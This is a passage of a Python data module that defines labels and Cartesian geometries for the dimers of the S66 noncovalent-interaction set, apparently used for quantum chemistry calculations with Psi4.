TAGL['%s-%s-monoA-unCP' % (dbse, '29' )] = """Monomer A from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '29' )] = """Monomer B from Pyridine-Uracil, pi-pi """
TAGL['%s-%s' % (dbse, '30' )] = """Benzene-Ethene """
TAGL['%s-%s-dimer' % (dbse, '30' )] = """Dimer from Benzene-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '30' )] = """Monomer A from Benzene-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '30' )] = """Monomer B from Benzene-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '30' )] = """Monomer A from Benzene-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '30' )] = """Monomer B from Benzene-Ethene """
TAGL['%s-%s' % (dbse, '31' )] = """Uracil-Ethene """
TAGL['%s-%s-dimer' % (dbse, '31' )] = """Dimer from Uracil-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '31' )] = """Monomer A from Uracil-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '31' )] = """Monomer B from Uracil-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '31' )] = """Monomer A from Uracil-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '31' )] = """Monomer B from Uracil-Ethene """
TAGL['%s-%s' % (dbse, '32' )] = """Uracil-Ethyne """
TAGL['%s-%s-dimer' % (dbse, '32' )] = """Dimer from Uracil-Ethyne """
TAGL['%s-%s-monoA-CP' % (dbse, '32' )] = """Monomer A from Uracil-Ethyne """
TAGL['%s-%s-monoB-CP' % (dbse, '32' )] = """Monomer B from Uracil-Ethyne """
TAGL['%s-%s-monoA-unCP' % (dbse, '32' )] = """Monomer A from Uracil-Ethyne """
TAGL['%s-%s-monoB-unCP' % (dbse, '32' )] = """Monomer B from Uracil-Ethyne """
TAGL['%s-%s' % (dbse, '33' )] = """Pyridine-Ethene """
TAGL['%s-%s-dimer' % (dbse, '33' )] = """Dimer from Pyridine-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '33' )] = """Monomer A from Pyridine-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '33' )] = """Monomer B from Pyridine-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '33' )] = """Monomer A from Pyridine-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '33' )] = """Monomer B from Pyridine-Ethene """
TAGL['%s-%s' % (dbse, '34' )] = """Pentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '34' )] = """Dimer from Pentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '34' )] = """Monomer A from Pentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '34' )] = """Monomer B from Pentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '34' )] = """Monomer A from Pentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '34' )] = """Monomer B from Pentane Dimer """
TAGL['%s-%s' % (dbse, '35' )] = """Neopentane-Pentane """
TAGL['%s-%s-dimer' % (dbse, '35' )] = """Dimer from Neopentane-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '35' )] = """Monomer A from Neopentane-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '35' )] = """Monomer B from Neopentane-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '35' )] = """Monomer A from Neopentane-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '35' )] = """Monomer B from Neopentane-Pentane """
TAGL['%s-%s' % (dbse, '36' )] = """Neopentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '36' )] = """Dimer from Neopentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '36' )] = """Monomer A from Neopentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '36' )] = """Monomer B from Neopentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '36' )] = """Monomer A from Neopentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '36' )] = """Monomer B from Neopentane Dimer """
TAGL['%s-%s' % (dbse, '37' )] = """Cyclopentane-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '37' )] = """Dimer from Cyclopentane-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '37' )] = """Monomer A from Cyclopentane-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '37' )] = """Monomer B from Cyclopentane-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '37' )] = """Monomer A from Cyclopentane-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '37' )] = """Monomer B from Cyclopentane-Neopentane """
TAGL['%s-%s' % (dbse, '38' )] = """Cyclopentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '38' )] = """Dimer from Cyclopentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '38' )] = """Monomer A from Cyclopentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '38' )] = """Monomer B from Cyclopentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '38' )] = """Monomer A from Cyclopentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '38' )] = """Monomer B from Cyclopentane Dimer """
TAGL['%s-%s' % (dbse, '39' )] = """Benzene-Cyclopentane """
TAGL['%s-%s-dimer' % (dbse, '39' )] = """Dimer from Benzene-Cyclopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '39' )] = """Monomer A from Benzene-Cyclopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '39' )] = """Monomer B from Benzene-Cyclopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '39' )] = """Monomer A from Benzene-Cyclopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '39' )] = """Monomer B from Benzene-Cyclopentane """
TAGL['%s-%s' % (dbse, '40' )] = """Benzene-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '40' )] = """Dimer from Benzene-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '40' )] = """Monomer A from Benzene-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '40' )] = """Monomer B from Benzene-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '40' )] = """Monomer A from Benzene-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '40' )] = """Monomer B from Benzene-Neopentane """
TAGL['%s-%s' % (dbse, '41' )] = """Uracil-Pentane """
TAGL['%s-%s-dimer' % (dbse, '41' )] = """Dimer from Uracil-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '41' )] = """Monomer A from Uracil-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '41' )] = """Monomer B from Uracil-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '41' )] = """Monomer A from Uracil-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '41' )] = """Monomer B from Uracil-Pentane """
TAGL['%s-%s' % (dbse, '42' )] = """Uracil-Cyclopentane """
TAGL['%s-%s-dimer' % (dbse, '42' )] = """Dimer from Uracil-Cyclopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '42' )] = """Monomer A from Uracil-Cyclopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '42' )] = """Monomer B from Uracil-Cyclopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '42' )] = """Monomer A from Uracil-Cyclopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '42' )] = """Monomer B from Uracil-Cyclopentane """
TAGL['%s-%s' % (dbse, '43' )] = """Uracil-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '43' )] = """Dimer from Uracil-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '43' )] = """Monomer A from Uracil-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '43' )] = """Monomer B from Uracil-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '43' )] = """Monomer A from Uracil-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '43' )] = """Monomer B from Uracil-Neopentane """
TAGL['%s-%s' % (dbse, '44' )] = """Ethene-Pentane """
TAGL['%s-%s-dimer' % (dbse, '44' )] = """Dimer from Ethene-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '44' )] = """Monomer A from Ethene-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '44' )] = """Monomer B from Ethene-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '44' )] = """Monomer A from Ethene-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '44' )] = """Monomer B from Ethene-Pentane """
TAGL['%s-%s' % (dbse, '45' )] = """Ethyne-Pentane """
TAGL['%s-%s-dimer' % (dbse, '45' )] = """Dimer from Ethyne-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '45' )] = """Monomer A from Ethyne-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '45' )] = """Monomer B from Ethyne-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '45' )] = """Monomer A from Ethyne-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '45' )] = """Monomer B from Ethyne-Pentane """
TAGL['%s-%s' % (dbse, '46' )] = """N-methylacetamide-Pentane """
TAGL['%s-%s-dimer' % (dbse, '46' )] = """Dimer from N-methylacetamide-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '46' )] = """Monomer A from N-methylacetamide-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '46' )] = """Monomer B from N-methylacetamide-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '46' )] = """Monomer A from N-methylacetamide-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '46' )] = """Monomer B from N-methylacetamide-Pentane """
TAGL['%s-%s' % (dbse, '47' )] = """Benzene Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '47' )] = """Dimer from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '47' )] = """Monomer A from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '47' )] = """Monomer B from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '47' )] = """Monomer A from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '47' )] = """Monomer B from Benzene Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '48' )] = """Pyridine Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '48' )] = """Dimer from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '48' )] = """Monomer A from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '48' )] = """Monomer B from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '48' )] = """Monomer A from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '48' )] = """Monomer B from Pyridine Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '49' )] = """Benzene-Pyridine, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '49' )] = """Dimer from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '49' )] = """Monomer A from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '49' )] = """Monomer B from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '49' )] = """Monomer A from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '49' )] = """Monomer B from Benzene-Pyridine, CH-pi """
TAGL['%s-%s' % (dbse, '50' )] = """Benzene-Ethyne, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '50' )] = """Dimer from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '50' )] = """Monomer A from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '50' )] = """Monomer B from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '50' )] = """Monomer A from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '50' )] = """Monomer B from Benzene-Ethyne, CH-pi """
TAGL['%s-%s' % (dbse, '51' )] = """Ethyne Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '51' )] = """Dimer from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '51' )] = """Monomer A from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '51' )] = """Monomer B from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '51' )] = """Monomer A from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '51' )] = """Monomer B from Ethyne Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '52' )] = """Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '52' )] = """Dimer from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '52' )] = """Monomer A from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '52' )] = """Monomer B from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '52' )] = """Monomer A from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '52' )] = """Monomer B from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s' % (dbse, '53' )] = """Benzene-Acetamide, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '53' )] = """Dimer from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '53' )] = """Monomer A from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '53' )] = """Monomer B from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '53' )] = """Monomer A from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '53' )] = """Monomer B from Benzene-Acetamide, NH-pi """
TAGL['%s-%s' % (dbse, '54' )] = """Benzene-Water, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '54' )] = """Dimer from Benzene-Water, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '54' )] = """Monomer A from Benzene-Water, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '54' )] = """Monomer B from Benzene-Water, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '54' )] = """Monomer A from Benzene-Water, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '54' )] = """Monomer B from Benzene-Water, OH-pi """
TAGL['%s-%s' % (dbse, '55' )] = """Benzene-Methanol, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '55' )] = """Dimer from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '55' )] = """Monomer A from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '55' )] = """Monomer B from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '55' )] = """Monomer A from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '55' )] = """Monomer B from Benzene-Methanol, OH-pi """
TAGL['%s-%s' % (dbse, '56' )] = """Benzene-Methylamine, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '56' )] = """Dimer from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '56' )] = """Monomer A from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '56' )] = """Monomer B from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '56' )] = """Monomer A from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '56' )] = """Monomer B from Benzene-Methylamine, NH-pi """
TAGL['%s-%s' % (dbse, '57' )] = """Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '57' )] = """Dimer from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '57' )] = """Monomer A from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '57' )] = """Monomer B from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '57' )] = """Monomer A from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '57' )] = """Monomer B from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s' % (dbse, '58' )] = """Pyridine Dimer, CH-N """
TAGL['%s-%s-dimer' % (dbse, '58' )] = """Dimer from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoA-CP' % (dbse, '58' )] = """Monomer A from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoB-CP' % (dbse, '58' )] = """Monomer B from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoA-unCP' % (dbse, '58' )] = """Monomer A from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoB-unCP' % (dbse, '58' )] = """Monomer B from Pyridine Dimer, CH-N """
TAGL['%s-%s' % (dbse, '59' )] = """Ethyne-Water, CH-O """
TAGL['%s-%s-dimer' % (dbse, '59' )] = """Dimer from Ethyne-Water, CH-O """
TAGL['%s-%s-monoA-CP' % (dbse, '59' )] = """Monomer A from Ethyne-Water, CH-O """
TAGL['%s-%s-monoB-CP' % (dbse, '59' )] = """Monomer B from Ethyne-Water, CH-O """
TAGL['%s-%s-monoA-unCP' % (dbse, '59' )] = """Monomer A from Ethyne-Water, CH-O """
TAGL['%s-%s-monoB-unCP' % (dbse, '59' )] = """Monomer B from Ethyne-Water, CH-O """
TAGL['%s-%s' % (dbse, '60' )] = """Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '60' )] = """Dimer from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '60' )] = """Monomer A from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '60' )] = """Monomer B from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '60' )] = """Monomer A from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '60' )] = """Monomer B from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s' % (dbse, '61' )] = """Pentane-Acetic Acid """
TAGL['%s-%s-dimer' % (dbse, '61' )] = """Dimer from Pentane-Acetic Acid """
TAGL['%s-%s-monoA-CP' % (dbse, '61' )] = """Monomer A from Pentane-Acetic Acid """
TAGL['%s-%s-monoB-CP' % (dbse, '61' )] = """Monomer B from Pentane-Acetic Acid """
TAGL['%s-%s-monoA-unCP' % (dbse, '61' )] = """Monomer A from Pentane-Acetic Acid """
TAGL['%s-%s-monoB-unCP' % (dbse, '61' )] = """Monomer B from Pentane-Acetic Acid """
TAGL['%s-%s' % (dbse, '62' )] = """Pentane-Acetamide """
TAGL['%s-%s-dimer' % (dbse, '62' )] = """Dimer from Pentane-Acetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '62' )] = """Monomer A from Pentane-Acetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '62' )] = """Monomer B from Pentane-Acetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '62' )] = """Monomer A from Pentane-Acetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '62' )] = """Monomer B from Pentane-Acetamide """
TAGL['%s-%s' % (dbse, '63' )] = """Benzene-Acetic Acid """
TAGL['%s-%s-dimer' % (dbse, '63' )] = """Dimer from Benzene-Acetic Acid """
TAGL['%s-%s-monoA-CP' % (dbse, '63' )] = """Monomer A from Benzene-Acetic Acid """
TAGL['%s-%s-monoB-CP' % (dbse, '63' )] = """Monomer B from Benzene-Acetic Acid """
TAGL['%s-%s-monoA-unCP' % (dbse, '63' )] = """Monomer A from Benzene-Acetic Acid """
TAGL['%s-%s-monoB-unCP' % (dbse, '63' )] = """Monomer B from Benzene-Acetic Acid """
TAGL['%s-%s' % (dbse, '64' )] = """N-methylacetamide-Ethene """
TAGL['%s-%s-dimer' % (dbse, '64' )] = """Dimer from N-methylacetamide-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '64' )] = """Monomer A from N-methylacetamide-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '64' )] = """Monomer B from N-methylacetamide-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '64' )] = """Monomer A from N-methylacetamide-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '64' )] = """Monomer B from N-methylacetamide-Ethene """
TAGL['%s-%s' % (dbse, '65' )] = """Pyridine-Ethyne """
TAGL['%s-%s-dimer' % (dbse, '65' )] = """Dimer from Pyridine-Ethyne """
TAGL['%s-%s-monoA-CP' % (dbse, '65' )] = """Monomer A from Pyridine-Ethyne """
TAGL['%s-%s-monoB-CP' % (dbse, '65' )] = """Monomer B from Pyridine-Ethyne """
TAGL['%s-%s-monoA-unCP' % (dbse, '65' )] = """Monomer A from Pyridine-Ethyne """
TAGL['%s-%s-monoB-unCP' % (dbse, '65' )] = """Monomer B from Pyridine-Ethyne """
TAGL['%s-%s' % (dbse, '66' )] = """Methylamine-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '66' )] = """Dimer from Methylamine-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '66' )] = """Monomer A from Methylamine-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '66' )] = """Monomer B from Methylamine-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '66' )] = """Monomer A from Methylamine-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '66' )] = """Monomer B from Methylamine-Pyridine """
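# A minimal illustration of how the tag keys above are built (assuming
# `dbse` holds the database name set earlier in this module, e.g.
# dbse = 'S66'; the lookup below is for reference only). The -CP and
# -unCP suffixes distinguish the counterpoise-corrected (ghost-atom)
# monomer computations from the uncorrected ones.
#
#     TAGL['%s-%s-dimer' % (dbse, '39')]   # -> "Dimer from Benzene-Cyclopentane "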
# <<< Geometry Specification Strings >>>
GEOS = {}
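# Each value below is a qcdb.Molecule parsed from a Psi4-style geometry
# string: the leading "0 1" on each fragment gives charge and spin
# multiplicity, "--" separates monomer A from monomer B of a dimer, and
# "units angstrom" fixes the coordinate units. For example,
# GEOS['%s-%s-dimer' % (dbse, '1')] retrieves the Water-Water dimer.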
GEOS['%s-%s-dimer' % (dbse, '1')] = qcdb.Molecule("""
0 1
O -0.70219605 -0.05606026 0.00994226
H -1.02219322 0.84677578 -0.01148871
H 0.25752106 0.04212150 0.00521900
--
0 1
O 2.22087107 0.02671679 0.00062048
H 2.59749268 -0.41166327 0.76674486
H 2.59313538 -0.44949618 -0.74478203
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '2')] = qcdb.Molecule("""
0 1
O -0.52532979 -0.05097108 -0.31451686
H -0.94200663 0.74790163 0.01125282
H 0.40369652 0.05978598 -0.07356837
--
0 1
O 2.31663329 0.04550085 0.07185839
H 2.68461611 -0.52657655 0.74938672
C 2.78163836 -0.42612907 -1.19030072
H 2.35082127 0.22496462 -1.94341475
H 3.86760205 -0.37533621 -1.26461265
H 2.45329574 -1.44599856 -1.38938136
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '3')] = qcdb.Molecule("""
0 1
O -0.68746490 -0.11174433 -0.01962547
H -1.04612154 0.77593821 0.01270684
H 0.27404252 0.02585065 -0.00349726
--
0 1
N 2.23397617 0.10318260 0.00585368
H 2.52934060 -0.44945538 -0.78893718
H 2.54405666 -0.40753849 0.82271317
C 2.89331145 1.41154656 -0.03438796
H 2.58276902 1.99327152 0.83012746
H 3.98462074 1.37225159 -0.04334363
H 2.56659917 1.94746403 -0.92221177
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '4')] = qcdb.Molecule("""
0 1
O -0.39201845 -0.38471874 0.07607132
H -0.91146085 0.41381204 0.17764877
H 0.52490382 -0.06848469 0.09051136
--
0 1
C 2.19770521 -2.24540349 -0.23031325
H 2.84766805 -3.10651537 -0.36322864
H 1.51672924 -2.16793143 -1.07417853
H 1.58468831 -2.38419948 0.65669511
C 2.95243729 -0.94739061 -0.09771974
O 2.37572184 0.12790424 0.05886900
N 4.30307041 -1.04489330 -0.16233771
H 4.70402204 -1.95542728 -0.29185281
C 5.17131253 0.10707716 -0.05289463
H 4.53481840 0.97537761 0.08188998
H 5.83690203 0.01562196 0.80319825
H 5.76577825 0.23649765 -0.95515382
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '5')] = qcdb.Molecule("""
0 1
O -0.63613493 -0.02328241 0.28059932
H 0.30809737 -0.04707875 0.07646369
C -1.15206541 -1.31128778 0.01525955
H -2.20994502 -1.29626539 0.26395586
H -1.05661024 -1.59267086 -1.03619061
H -0.67483575 -2.08627276 0.62051145
--
0 1
O 2.21041928 -0.12212177 -0.01210270
H 2.67920859 0.49226275 -0.58176865
C 2.71925320 0.03489717 1.30961462
H 2.16568412 -0.65329926 1.93974550
H 3.77824931 -0.21554173 1.36633776
H 2.56681356 1.04559122 1.68750717
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '6')] = qcdb.Molecule("""
0 1
O -0.70692019 0.04583037 0.00638610
H 0.26562361 0.07171014 0.00133929
C -1.07667067 -1.31391581 0.00161428
H -2.16292358 -1.36319577 0.00586542
H -0.72340594 -1.84465168 -0.88774350
H -0.71607978 -1.85282083 0.88307978
--
0 1
N 2.20127244 -0.03642087 -0.00333839
H 2.57189199 0.47135563 0.78979400
H 2.57201528 0.42791769 -0.82259722
C 2.67902438 -1.42245432 0.03412282
H 2.28713954 -1.95647960 -0.82806891
H 3.76573553 -1.52918949 0.03715731
H 2.28689798 -1.90918449 0.92375496
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '7')] = qcdb.Molecule("""
0 1
O -0.20877739 -0.21687067 -1.03240597
H 0.71112593 -0.38689175 -0.77396240
C -1.02217337 -0.74117114 -0.00545419
H -2.05749119 -0.53870733 -0.26859725
H -0.90774336 -1.82182632 0.10853710
H -0.82463111 -0.27549472 0.96464547
--
0 1
C 1.97349049 1.90322403 0.43230118
H 2.47988412 2.86467311 0.39743082
H 1.56294637 1.75708815 1.43017782
H 1.14384269 1.89371075 -0.26920435
C 2.88912087 0.74828521 0.11638497
O 2.46492608 -0.37162558 -0.16869657
N 4.21525779 1.01000949 0.17558433
H 4.51327024 1.92043762 0.47327152
C 5.19766382 -0.03010182 -0.04715949
H 4.84110663 -0.68103914 -0.83933645
H 6.13803306 0.42342202 -0.34567319
H 5.35717393 -0.63462872 0.84491605
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '8')] = qcdb.Molecule("""
0 1
O -0.78656202 0.04516844 -0.00718912
H 0.17770677 0.01269590 -0.00683539
C -1.24799094 -1.29028354 0.00108362
H -2.33427744 -1.25889710 0.00022120
H -0.92596575 -1.84976810 -0.88044538
H -0.92702783 -1.83846288 0.89007652
--
0 1
O 2.12888314 -0.05133660 -0.00474093
H 2.56808728 0.33681560 -0.76461362
H 2.56676744 0.35126768 0.74834860
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '9')] = qcdb.Molecule("""
0 1
N -0.89345122 -0.04384432 -0.04299745
H 0.09694826 -0.25605945 -0.07106993
H -1.36843879 -0.93339065 0.03383773
C -1.17578248 0.75790769 1.14523719
H -2.24162660 0.97221601 1.19502464
H -0.88078955 0.30424674 2.09720910
H -0.66300572 1.71432940 1.06080916
--
0 1
O 2.28445953 -0.04747650 0.02782522
H 2.56648565 0.32247227 -0.81203886
C 2.67037338 0.86410776 1.04726138
H 2.34719033 0.43447509 1.99032792
H 3.75142862 1.00319123 1.08630135
H 2.19189882 1.83770561 0.93208484
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '10')] = qcdb.Molecule("""
0 1
N -0.63864138 0.47091637 0.04456848
H 0.18995436 -0.11393716 -0.00577361
H -1.30046894 0.08125680 -0.61366848
C -1.19865882 0.39139858 1.39194660
H -2.09273777 1.00924471 1.45316749
H -1.46274551 -0.61584367 1.72945219
H -0.48027554 0.79867491 2.10108731
--
0 1
N 2.39889347 -0.45552115 0.19704452
H 2.69516214 -0.18098342 -0.73094072
H 3.02244314 -1.20321147 0.47223938
C 2.55912345 0.67968944 1.11071982
H 2.28893315 0.36499366 2.11637293
H 3.56653376 1.10146600 1.14769156
H 1.86658307 1.46546492 0.81806258
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '11')] = qcdb.Molecule("""
0 1
N -0.56970824 0.81437245 0.10109775
H 0.13087774 0.56141065 -0.58761455
H -1.46125215 0.52691480 -0.28042996
C -0.30551437 0.06571030 1.32879173
H -1.05714948 0.31427017 2.07595940
H -0.28802353 -1.02229248 1.21484626
H 0.66045772 0.36850913 1.73024224
--
0 1
C 2.25689155 2.69009990 -0.14932730
H 2.38151002 3.10127663 -1.14837163
H 2.76346292 3.33109245 0.56845722
H 1.19047979 2.66357037 0.06909413
C 2.76888324 1.27230222 -0.14703327
O 2.30890335 0.40656580 -0.88620788
N 3.75536621 0.99926987 0.74529744
H 4.15512723 1.75420265 1.27065019
C 4.34381155 -0.32032067 0.82279701
H 3.55563493 -1.06165082 0.72977641
H 5.06507133 -0.49231605 0.02425262
H 4.83846506 -0.43618886 1.78273654
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '12')] = qcdb.Molecule("""
0 1
N -0.53346397 -0.27959351 0.10699576
H -0.62915138 -1.24842455 0.38284867
H -1.12260363 -0.16615944 -0.70776410
C -1.01690943 0.58848610 1.18737346
H -0.91275967 1.62555174 0.87952116
